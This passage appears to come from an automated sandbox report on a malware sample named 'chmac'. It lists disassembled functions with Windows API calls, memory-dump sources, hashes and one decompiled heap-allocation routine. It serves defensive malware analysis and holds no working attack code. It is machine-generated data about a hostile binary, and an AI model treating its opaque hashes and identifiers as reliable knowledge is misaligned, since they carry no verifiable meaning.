FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00405609

Memory Dump Source

Source File: 00000010.00000001.341979974.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000001.342024233.0000000000414000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_1_400000_chmac.jbxd

Yara matches

Similarity

API ID: EnvironmentStrings$Free
String ID:
API String ID: 3328510275-0
Opcode ID: 8cd0ade3987da643afe372fdbc3b04457b893c98baeb1de225cc927f8a7ffae8
Instruction ID: c5c85d496f4b9afafe33008ffa5735024e7f647e2ae8fec8aafe46d04be69a25
Opcode Fuzzy Hash: 8cd0ade3987da643afe372fdbc3b04457b893c98baeb1de225cc927f8a7ffae8
Instruction Fuzzy Hash: E7E0E5371049206BD22127267C8AA6B2A1DCFC17B5765063BF809B61C2AE3D8E0208FD

Uniqueness

Uniqueness Score: -1.00%

Function 025712A0, Relevance: 1.7, Strings: 1, Instructions: 460
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$gq, xrefs: 02571349

Memory Dump Source

Source File: 00000010.00000002.359472930.0000000002570000.00000040.00000001.sdmp, Offset: 02570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_2570000_chmac.jbxd

Similarity

API ID:
String ID: $gq
API String ID: 0-815412418
Opcode ID: e54388f32148a94f6d1e65590d55245d914e5ab9414a955f59027a4bdddc805e
Instruction ID: 25b8de5fb4d2837f0999ef257430b55868ee623e626d3468197d1aaa975e8757
Opcode Fuzzy Hash: e54388f32148a94f6d1e65590d55245d914e5ab9414a955f59027a4bdddc805e
Instruction Fuzzy Hash: 7B220034A00A15CFCB24DF24D584A6ABBF2BF89300F10C9A9D85A9B756DB34ED45CF94

Uniqueness

Uniqueness Score: -1.00%

Function 00A5AA7E, Relevance: 1.6, APIs: 1, Instructions: 92
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNELBASE(?,00000E80), ref: 00A5AB2D

Memory Dump Source

Source File: 00000010.00000002.359085627.0000000000A5A000.00000040.00000001.sdmp, Offset: 00A5A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_a5a000_chmac.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: d44209a95e4381c4997caa4f0cb617ddfa766d1a75fd3acf66b87ffc66dbf81c
Instruction ID: ddccbb78b47b7e909c04f2d62cce922d971abc2a090aaa5b611af1e8e902d1d0
Opcode Fuzzy Hash: d44209a95e4381c4997caa4f0cb617ddfa766d1a75fd3acf66b87ffc66dbf81c
Instruction Fuzzy Hash: 3D31F772544384AFE7228F25CC45FA7BFBCEF06310F08859AED859B152D265E909C7B1

Uniqueness

Uniqueness Score: -1.00%

Function 00A5AB75, Relevance: 1.6, APIs: 1, Instructions: 89
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryValueExW.KERNELBASE(?,00000E80,8030A92B,00000000,00000000,00000000,00000000), ref: 00A5AC30

Memory Dump Source

Source File: 00000010.00000002.359085627.0000000000A5A000.00000040.00000001.sdmp, Offset: 00A5A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_a5a000_chmac.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 01ad26df1c1170fc9cf02a8c3343b943c50ea25b3ed1c05092295e22f5888ae5
Instruction ID: 3f1bd841726735c1b3d4e6442baa39bcc195e38563b5ead4cfe0ed38f28c6467
Opcode Fuzzy Hash: 01ad26df1c1170fc9cf02a8c3343b943c50ea25b3ed1c05092295e22f5888ae5
Instruction Fuzzy Hash: 6931B3712057805FE722CF65CC45FA2BFA8EF06310F08859AE984DB153D264E94CCB61

Uniqueness

Uniqueness Score: -1.00%

Function 00A5B51B, Relevance: 1.6, APIs: 1, Instructions: 84
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetClassInfoW.USER32 ref: 00A5B5BA

Memory Dump Source

Source File: 00000010.00000002.359085627.0000000000A5A000.00000040.00000001.sdmp, Offset: 00A5A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_a5a000_chmac.jbxd

Similarity

API ID: ClassInfo
String ID:
API String ID: 3534257612-0
Opcode ID: 455b5ed808a0e2adabbf8cbf6fa84d8f1039fce9275589f1c8c0e339763f9800
Instruction ID: 41bd5d507685780005007dbe95f695a8961e332d5adf7053fddf34526ff43a1e
Opcode Fuzzy Hash: 455b5ed808a0e2adabbf8cbf6fa84d8f1039fce9275589f1c8c0e339763f9800
Instruction Fuzzy Hash: AC31287650E7C05FE7138B259C50A52BFB4AF07211B0A80DBD985CF1A3E229991DD772

Uniqueness

Uniqueness Score: -1.00%

Function 04C50416, Relevance: 1.6, APIs: 1, Instructions: 84
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexW.KERNELBASE(?,?), ref: 04C504B1

Memory Dump Source

Source File: 00000010.00000002.359832250.0000000004C50000.00000040.00000001.sdmp, Offset: 04C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_4c50000_chmac.jbxd

Similarity

API ID: CreateMutex
String ID:
API String ID: 1964310414-0
Opcode ID: 21370a9eb0f3f41fa21f109cded562dbf7f376340087ae1bc18c8e5c73c77c92
Instruction ID: b391812747cb9a5cdb212b3cd33501bc32e7f83027c91ba5d2a09ba051c71c84
Opcode Fuzzy Hash: 21370a9eb0f3f41fa21f109cded562dbf7f376340087ae1bc18c8e5c73c77c92
Instruction Fuzzy Hash: 4B3181715053846FE722CF25CD85F66FFE8EF05310F0884AAE984DB252D365E948C765

Uniqueness

Uniqueness Score: -1.00%

Function 00A5B080, Relevance: 1.6, APIs: 1, Instructions: 83
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetConsoleCtrlHandler.KERNELBASE(?,00000E80,?,?), ref: 00A5B11A

Memory Dump Source

Source File: 00000010.00000002.359085627.0000000000A5A000.00000040.00000001.sdmp, Offset: 00A5A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_a5a000_chmac.jbxd

Similarity

API ID: ConsoleCtrlHandler
String ID:
API String ID: 1513847179-0
Opcode ID: 5812ae4d6f8f14fc5422a45c362e0df47fa98247283e2d34d05fa5a16ded855c
Instruction ID: 7fa6f4e71f104d8107eb9b722d04480b1c0d3549f6ced126bda242fdd32ee8e8
Opcode Fuzzy Hash: 5812ae4d6f8f14fc5422a45c362e0df47fa98247283e2d34d05fa5a16ded855c
Instruction Fuzzy Hash: 0021837540D3C06FD3138B259C51B62BFB4EF87610F0A84DBE984CB5A3D225A919C7B2

Uniqueness

Uniqueness Score: -1.00%

Function 00A5AAAE, Relevance: 1.6, APIs: 1, Instructions: 74
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNELBASE(?,00000E80), ref: 00A5AB2D

Memory Dump Source

Source File: 00000010.00000002.359085627.0000000000A5A000.00000040.00000001.sdmp, Offset: 00A5A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_a5a000_chmac.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 5d3ebf8f7312bdeedf0cce4110c804de0bd23ccb189952c5464be4920ebc1c26
Instruction ID: 92e85be31dacbc3d8127f670c1938011e9bf39c8667a26fc056b2eded25e34d8
Opcode Fuzzy Hash: 5d3ebf8f7312bdeedf0cce4110c804de0bd23ccb189952c5464be4920ebc1c26
Instruction Fuzzy Hash: FD210172600204AFE7219F19CD44F6AFBECFF04311F14861AED459B241D630E908CBB6

Uniqueness

Uniqueness Score: -1.00%

Function 04C5043E, Relevance: 1.6, APIs: 1, Instructions: 72
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexW.KERNELBASE(?,?), ref: 04C504B1

Memory Dump Source

Source File: 00000010.00000002.359832250.0000000004C50000.00000040.00000001.sdmp, Offset: 04C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_4c50000_chmac.jbxd

Similarity

API ID: CreateMutex
String ID:
API String ID: 1964310414-0
Opcode ID: 1a7c177a1cc7bcc6df0e77f80ad7d4ffc858c566df729d67e0cfe1586ef9412c
Instruction ID: 4137140e08b0e0cf57fea4323f7d2116a19d8fce11faaeaac78bac46b70329dc
Opcode Fuzzy Hash: 1a7c177a1cc7bcc6df0e77f80ad7d4ffc858c566df729d67e0cfe1586ef9412c
Instruction Fuzzy Hash: 9921C171500240AFE721CF2ACD85B6AFBD8EF04320F08846AED44DB252D371F544CB65

Uniqueness

Uniqueness Score: -1.00%

Function 00A5ABB6, Relevance: 1.6, APIs: 1, Instructions: 69
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryValueExW.KERNELBASE(?,00000E80,8030A92B,00000000,00000000,00000000,00000000), ref: 00A5AC30

Memory Dump Source

Source File: 00000010.00000002.359085627.0000000000A5A000.00000040.00000001.sdmp, Offset: 00A5A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_a5a000_chmac.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 168189830f452c6739cabf24984442a50711e32a0f1d0c157c48a1ddd5b54eb9
Instruction ID: 340981ca3003a1d1dae788d9167f2db469d5cd182618fad5b475981bfe717f70
Opcode Fuzzy Hash: 168189830f452c6739cabf24984442a50711e32a0f1d0c157c48a1ddd5b54eb9
Instruction Fuzzy Hash: 33219D71600604AFE721CF55DD84F66BBECFF14711F04856AED499B252E370E848CAB2

Uniqueness

Uniqueness Score: -1.00%

Function 00A5BB8A, Relevance: 1.6, APIs: 1, Instructions: 61
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostMessageW.USER32(?,?,?,?), ref: 00A5BC01

Memory Dump Source

Source File: 00000010.00000002.359085627.0000000000A5A000.00000040.00000001.sdmp, Offset: 00A5A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_a5a000_chmac.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 5dc8493b536c1c292312f39ec4657ceaa4cb7acdc503543cbbbb7c8a77825860
Instruction ID: b61ed7dd59837b13e72003a24e455bced41655b6875e98a5995c980ca8f78661
Opcode Fuzzy Hash: 5dc8493b536c1c292312f39ec4657ceaa4cb7acdc503543cbbbb7c8a77825860
Instruction Fuzzy Hash: D3218E714097C49FDB128B21DC50AA2BFB0EF1B320F0D84DAEDC44F163D265A958D762

Uniqueness

Uniqueness Score: -1.00%

Function 00A5A59B, Relevance: 1.6, APIs: 1, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00A5A606

Memory Dump Source

Source File: 00000010.00000002.359085627.0000000000A5A000.00000040.00000001.sdmp, Offset: 00A5A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_a5a000_chmac.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 4b0e253a2cbcf2ae43b5e457858ccd942cfd0be50d652ef760915032adafec00
Instruction ID: 223edea98e216393bd1fde915149dde1c0447a2de17e959becaa5c6e948f8f73
Opcode Fuzzy Hash: 4b0e253a2cbcf2ae43b5e457858ccd942cfd0be50d652ef760915032adafec00
Instruction Fuzzy Hash: 7311A271409380AFDB228F51DC44A62FFB4FF4A320F08859AED858B562D235A419DB62

Uniqueness

Uniqueness Score: -1.00%

Function 00A5BF0F, Relevance: 1.6, APIs: 1, Instructions: 59
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostMessageW.USER32(?,?,?,?), ref: 00A5BF79

Memory Dump Source

Source File: 00000010.00000002.359085627.0000000000A5A000.00000040.00000001.sdmp, Offset: 00A5A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_a5a000_chmac.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 16cb916e2682595ad07337f5ea95c7d4d268face96855919905654bbeca60051
Instruction ID: a7bffa472078cf0da2c0883953a0a8b81072a1ec47923d10869d53121c3c120c
Opcode Fuzzy Hash: 16cb916e2682595ad07337f5ea95c7d4d268face96855919905654bbeca60051
Instruction Fuzzy Hash: 9511BE315097C0AFDB228F25DC45B52FFB4EF16220F0885DEED858B563D265A81CCB62

Uniqueness

Uniqueness Score: -1.00%

Function 04C50205, Relevance: 1.6, APIs: 1, Instructions: 58windowCOMMON

Download Yara Rule

APIs

DispatchMessageW.USER32(?), ref: 04C50270

Memory Dump Source

Source File: 00000010.00000002.359832250.0000000004C50000.00000040.00000001.sdmp, Offset: 04C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_4c50000_chmac.jbxd

Similarity

API ID: DispatchMessage
String ID:
API String ID: 2061451462-0
Opcode ID: 4369921ea6f8aea267b2dee6dec37f50fe8e15c6578b73aaf325787e8dce06a9
Instruction ID: c31509e8101a7d491168bca0955c00d916f84b3c1467ca59ce8661e2138425cb
Opcode Fuzzy Hash: 4369921ea6f8aea267b2dee6dec37f50fe8e15c6578b73aaf325787e8dce06a9
Instruction Fuzzy Hash: 89118E754097C0AFD7138F259C44B61BFB4EF47624F0984DEED848F263D2696948CB62

Uniqueness

Uniqueness Score: -1.00%

Function 00A5BADE, Relevance: 1.6, APIs: 1, Instructions: 57windowCOMMON

Download Yara Rule

APIs

CreateIconFromResourceEx.USER32 ref: 00A5BB4A

Memory Dump Source

Source File: 00000010.00000002.359085627.0000000000A5A000.00000040.00000001.sdmp, Offset: 00A5A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_a5a000_chmac.jbxd

Similarity

API ID: CreateFromIconResource
String ID:
API String ID: 3668623891-0
Opcode ID: 9dd691d68d809bde3b09c5383e6cede9c6319b04bd342d9026ee56532f0e5f89
Instruction ID: a25c9d42b4ebc88feeda11c7c89503e11f602639efd2897ad7532f1c7892686d
Opcode Fuzzy Hash: 9dd691d68d809bde3b09c5383e6cede9c6319b04bd342d9026ee56532f0e5f89
Instruction Fuzzy Hash: C0119D32409384AFDB228F55DC44A52FFB4FF49320F09899EED898B562C375A418CB61

Uniqueness

Uniqueness Score: -1.00%

Function 04C50917, Relevance: 1.6, APIs: 1, Instructions: 56COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(?), ref: 04C50970

Memory Dump Source

Source File: 00000010.00000002.359832250.0000000004C50000.00000040.00000001.sdmp, Offset: 04C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_4c50000_chmac.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 0e22f9f7ea29e4bfc87c0a6fe62da1ffd2fdbc6e923c128de02355588ac8bf2d
Instruction ID: ac4d262421a7d4624aef6a0317000a389668d0aee096cd1406fb2090ec17765a
Opcode Fuzzy Hash: 0e22f9f7ea29e4bfc87c0a6fe62da1ffd2fdbc6e923c128de02355588ac8bf2d
Instruction Fuzzy Hash: 9C1190715097849FD712CF25DC85B42BFB4EF42220F0984AADD85CB263D224A948CB62

Uniqueness

Uniqueness Score: -1.00%

Function 04C502B4, Relevance: 1.6, APIs: 1, Instructions: 56COMMON

Download Yara Rule

APIs

SetCurrentDirectoryW.KERNELBASE(?), ref: 04C5030C

Memory Dump Source

Source File: 00000010.00000002.359832250.0000000004C50000.00000040.00000001.sdmp, Offset: 04C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_4c50000_chmac.jbxd

Similarity

API ID: CurrentDirectory
String ID:
API String ID: 1611563598-0
Opcode ID: b700639d544f3025be5d0f72dda159e27f7b39e94a13e3be2d72a4d8ed70cadd
Instruction ID: 700226ab67b59034be59ad17cc3a0a2013ef3856c7758d8bafdc5ba70641f35d
Opcode Fuzzy Hash: b700639d544f3025be5d0f72dda159e27f7b39e94a13e3be2d72a4d8ed70cadd
Instruction Fuzzy Hash: 4E11A3715053849FD711CF26DC85B56BFE8EF42220F0884AAED89CF262D274E948CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00A5B572, Relevance: 1.5, APIs: 1, Instructions: 49COMMON

Download Yara Rule

APIs

GetClassInfoW.USER32 ref: 00A5B5BA

Memory Dump Source

Source File: 00000010.00000002.359085627.0000000000A5A000.00000040.00000001.sdmp, Offset: 00A5A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_a5a000_chmac.jbxd

Similarity

API ID: ClassInfo
String ID:
API String ID: 3534257612-0
Opcode ID: 463f07e4e5b20782c14cb56eeaebefd3aeab9d680a497633cc0634ff4bafceae
Instruction ID: 940e236da4c8f65decc1e53d6c6a15b0f5c261679efbf5258690039c0a972ab9
Opcode Fuzzy Hash: 463f07e4e5b20782c14cb56eeaebefd3aeab9d680a497633cc0634ff4bafceae
Instruction Fuzzy Hash: 220165756006408FE715CF19D984B66FBE4FF04712F08C099DD468B652E770E808CB71

Uniqueness

Uniqueness Score: -1.00%

Function 00A5A948, Relevance: 1.5, APIs: 1, Instructions: 48COMMON

Download Yara Rule

APIs

SetWindowLongW.USER32 ref: 00A5A9A2

Memory Dump Source

Source File: 00000010.00000002.359085627.0000000000A5A000.00000040.00000001.sdmp, Offset: 00A5A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_a5a000_chmac.jbxd

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: 2a6a23732cbc18cefada9b8492200f2ca667a0e5dc4ff813a28e428480e88a08
Instruction ID: 6d86c6d29b3026c867a7b9edcfa50b5eb92796148a996090d6fcc89f605d8fbc
Opcode Fuzzy Hash: 2a6a23732cbc18cefada9b8492200f2ca667a0e5dc4ff813a28e428480e88a08
Instruction Fuzzy Hash: 2211AC314097849FD722CF15DC84A52FFB4EF16320F09859AED894B263C379A818CB62

Uniqueness

Uniqueness Score: -1.00%

Function 04C502D2, Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

SetCurrentDirectoryW.KERNELBASE(?), ref: 04C5030C

Memory Dump Source

Source File: 00000010.00000002.359832250.0000000004C50000.00000040.00000001.sdmp, Offset: 04C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_4c50000_chmac.jbxd

Similarity

API ID: CurrentDirectory
String ID:
API String ID: 1611563598-0
Opcode ID: a37c373db180f267aaa4d3e1ee0b7163bb12f043b994a3a41714e83314b2f135
Instruction ID: 4f285a56ea1b89d232956b8adb881b700fdb3a4c6b65b7b9f001304d6cb7fb05
Opcode Fuzzy Hash: a37c373db180f267aaa4d3e1ee0b7163bb12f043b994a3a41714e83314b2f135
Instruction Fuzzy Hash: A501B5716013408FD751CF1AD98576AFBD4EF00320F08C0AADD49CF256D674E544CB66

Uniqueness

Uniqueness Score: -1.00%

Function 00A5A5C2, Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00A5A606

Memory Dump Source

Source File: 00000010.00000002.359085627.0000000000A5A000.00000040.00000001.sdmp, Offset: 00A5A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_a5a000_chmac.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 1fa6062fa9f08ac9503673727472b1ad451e0c78bf18ad03e90b203933e35ee2
Instruction ID: 73074c84797e66797856d7074221e4e2dd995f8555616faea91624d3d80e0def
Opcode Fuzzy Hash: 1fa6062fa9f08ac9503673727472b1ad451e0c78bf18ad03e90b203933e35ee2
Instruction Fuzzy Hash: CD016D315006409FDB218F55D944B56FFE0FF58721F08C99AEE894BA12D275A418DF62

Uniqueness

Uniqueness Score: -1.00%

Function 00A5BB06, Relevance: 1.5, APIs: 1, Instructions: 45windowCOMMON

Download Yara Rule

APIs

CreateIconFromResourceEx.USER32 ref: 00A5BB4A

Memory Dump Source

Source File: 00000010.00000002.359085627.0000000000A5A000.00000040.00000001.sdmp, Offset: 00A5A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_a5a000_chmac.jbxd

Similarity

API ID: CreateFromIconResource
String ID:
API String ID: 3668623891-0
Opcode ID: 7cdbfb1d09ca3df8af266e31a0348e448b2fa50de4b8bf866ffe3e80ceed2160
Instruction ID: 5046e91ddda53e120d767a57a272a0670c5a40678a5c4197a160d1e59f59136f
Opcode Fuzzy Hash: 7cdbfb1d09ca3df8af266e31a0348e448b2fa50de4b8bf866ffe3e80ceed2160
Instruction Fuzzy Hash: 42016D31400644DFDB218F55D944B56FFE0FF08322F0889AEEE894B626D375A418DB72

Uniqueness

Uniqueness Score: -1.00%

Function 00A5B0CA, Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

SetConsoleCtrlHandler.KERNELBASE(?,00000E80,?,?), ref: 00A5B11A

Memory Dump Source

Source File: 00000010.00000002.359085627.0000000000A5A000.00000040.00000001.sdmp, Offset: 00A5A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_a5a000_chmac.jbxd

Similarity

API ID: ConsoleCtrlHandler
String ID:
API String ID: 1513847179-0
Opcode ID: 400445bc70f012f71c409e817d9e9668ed67ae52a365e94b2f9a87737535a9c5
Instruction ID: ec52ba14541b432dabcafff363cf97485b3e3f837b2026657dc1d12cadef9701
Opcode Fuzzy Hash: 400445bc70f012f71c409e817d9e9668ed67ae52a365e94b2f9a87737535a9c5
Instruction Fuzzy Hash: 4E01AD75600604ABD250DF1ADC82B26FBE8FB88B20F14C15AED085B741E632F915CBE6

Uniqueness

Uniqueness Score: -1.00%

Function 04C5093E, Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(?), ref: 04C50970

Memory Dump Source

Source File: 00000010.00000002.359832250.0000000004C50000.00000040.00000001.sdmp, Offset: 04C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_4c50000_chmac.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 06d47d1b5e7060c3eebd9e386f21eaf32f547973988457869ff8f80fcb9ce426
Instruction ID: 6f271d88a2074eeedd33c96d582fa168b3e6b027da3323fd7b0e2b270b84add6
Opcode Fuzzy Hash: 06d47d1b5e7060c3eebd9e386f21eaf32f547973988457869ff8f80fcb9ce426
Instruction Fuzzy Hash: 4E01DF716042408FEB11CF1AE984756FBA4EF40320F08C0AADE49CB616D274E448CBB2

Uniqueness

Uniqueness Score: -1.00%

Function 00A5BF3E, Relevance: 1.5, APIs: 1, Instructions: 42windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 00A5BF79

Memory Dump Source

Source File: 00000010.00000002.359085627.0000000000A5A000.00000040.00000001.sdmp, Offset: 00A5A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_a5a000_chmac.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: bf1660aada8d411f3afb666cdf4f47ae225912b51e5c4542b78ce84e12271143
Instruction ID: 8b72d7c7ab571e55c82c5ef02ae14bd5ddcc97561e1eed634cc2dd5a4aa5b63d
Opcode Fuzzy Hash: bf1660aada8d411f3afb666cdf4f47ae225912b51e5c4542b78ce84e12271143
Instruction Fuzzy Hash: 730188315106409FDB218F15DC84B66FBA0EB18322F0884AAED898B652D371E41CDF62

Uniqueness

Uniqueness Score: -1.00%

Function 00A5BBC6, Relevance: 1.5, APIs: 1, Instructions: 38windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 00A5BC01

Memory Dump Source

Source File: 00000010.00000002.359085627.0000000000A5A000.00000040.00000001.sdmp, Offset: 00A5A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_a5a000_chmac.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: aa2746ee047cef5698adee64cd108169a7b95c00402ad62752e5d26a9bd87c4a
Instruction ID: 473d821f537d182ac8b63004b5a9a60751116e4f0c6c93cb13125ec1c538b4d1
Opcode Fuzzy Hash: aa2746ee047cef5698adee64cd108169a7b95c00402ad62752e5d26a9bd87c4a
Instruction Fuzzy Hash: 48018B31400644DFDB218F06D984B61FFA0FF18322F08C89AED894B622D375A458DBB2

Uniqueness

Uniqueness Score: -1.00%

Function 00A5A96A, Relevance: 1.5, APIs: 1, Instructions: 37COMMON

Download Yara Rule

APIs

SetWindowLongW.USER32 ref: 00A5A9A2

Memory Dump Source

Source File: 00000010.00000002.359085627.0000000000A5A000.00000040.00000001.sdmp, Offset: 00A5A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_a5a000_chmac.jbxd

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: e1b32635e3899fc716803a3bf096098a2097d10d91d7f8d5958b40591ba2de75
Instruction ID: 9dd5a61a836b3fec6c5b85302cc1154301f2898fc0836c2c3e7299e3307359bb
Opcode Fuzzy Hash: e1b32635e3899fc716803a3bf096098a2097d10d91d7f8d5958b40591ba2de75
Instruction Fuzzy Hash: 9901A935604684DFDB218F05D988B62FFA0FF14722F08C5AADD8A0B612C275A418DBA2

Uniqueness

Uniqueness Score: -1.00%

Function 04C5023E, Relevance: 1.5, APIs: 1, Instructions: 35windowCOMMON

Download Yara Rule

APIs

DispatchMessageW.USER32(?), ref: 04C50270

Memory Dump Source

Source File: 00000010.00000002.359832250.0000000004C50000.00000040.00000001.sdmp, Offset: 04C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_4c50000_chmac.jbxd

Similarity

API ID: DispatchMessage
String ID:
API String ID: 2061451462-0
Opcode ID: 56ce99fc8e556e8857d5d7788febb1285d0a77d7a6c446a3c8fe58c8f82deae8
Instruction ID: b28f83754e51d55393ddcab4d06af8570258239312ac07efe9dd2e24008c8374
Opcode Fuzzy Hash: 56ce99fc8e556e8857d5d7788febb1285d0a77d7a6c446a3c8fe58c8f82deae8
Instruction Fuzzy Hash: FDF0AF359086448FDB21CF06ED89765FFA0EF04721F08C4AADD498B222D275A588CAA6

Uniqueness

Uniqueness Score: -1.00%

Function 00403E3D, Relevance: 1.5, APIs: 1, Instructions: 32
memoryCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E00403E3D(void* __ecx, long _a4) {
				void* _t4;
				void* _t6;
				void* _t7;
				long _t8;

				_t7 = __ecx;
				_t8 = _a4;
				if(_t8 > 0xffffffe0) {
					L7:
					 *((intOrPtr*)(E00404831())) = 0xc;
					__eflags = 0;
					return 0;
				}
				if(_t8 == 0) {
					_t8 = _t8 + 1;
				}
				while(1) {
					_t4 = RtlAllocateHeap( *0x4132b0, 0, _t8); // executed
					if(_t4 != 0) {
						break;
					}
					__eflags = E00403829();
					if(__eflags == 0) {
						goto L7;
					}
					_t6 = E004068FD(_t7, __eflags, _t8);
					_pop(_t7);
					__eflags = _t6;
					if(_t6 == 0) {
						goto L7;
					}
				}
				return _t4;
			}

APIs

RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00407C67,?,00000000,?,004067DA,?,00000004,?,?,?,?,00403B03), ref: 00403E6F

Memory Dump Source

Source File: 00000010.00000001.341979974.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000001.342024233.0000000000414000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_1_400000_chmac.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: a4c9c6b9c171d7e3068f9dcb93680387a8cae48819217d3cebbdef174e207782
Instruction ID: 2c5ed35c3885d6f2518923907421e71a1374dda36297243b1d9f5d3b1e0eb56a
Opcode Fuzzy Hash: a4c9c6b9c171d7e3068f9dcb93680387a8cae48819217d3cebbdef174e207782
Instruction Fuzzy Hash: 54E03922505222A6D6213F6ADC04F5B7E4C9F817A2F158777AD15B62D0CB389F0181ED

Uniqueness

Uniqueness Score: -1.00%

Function 025702E8, Relevance: 1.4, Strings: 1, Instructions: 175COMMON

Download Yara Rule

Strings

`5q, xrefs: 025703A5

Memory Dump Source

Source File: 00000010.00000002.359472930.0000000002570000.00000040.00000001.sdmp, Offset: 02570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_2570000_chmac.jbxd

Similarity

API ID:
String ID: `5q
API String ID: 0-3867205651
Opcode ID: 94f2edf50253f4fc079ed555e958fe4afdda1a39756404975fd3f5e3080715c5
Instruction ID: 9c20f262865b63a861b9a4435e8ea7be31b583b1bd41c4a25f33ec7f6ed1b880
Opcode Fuzzy Hash: 94f2edf50253f4fc079ed555e958fe4afdda1a39756404975fd3f5e3080715c5
Instruction Fuzzy Hash: 8351D134B092058FCB05DF68D5A47AEBBF2FF89310F1484A9D5469B3A1DB31AC05CB55

Uniqueness

Uniqueness Score: -1.00%

Function 02572D58, Relevance: 1.4, Strings: 1, Instructions: 135COMMON

Download Yara Rule

Strings

, xrefs: 02572E76

Memory Dump Source

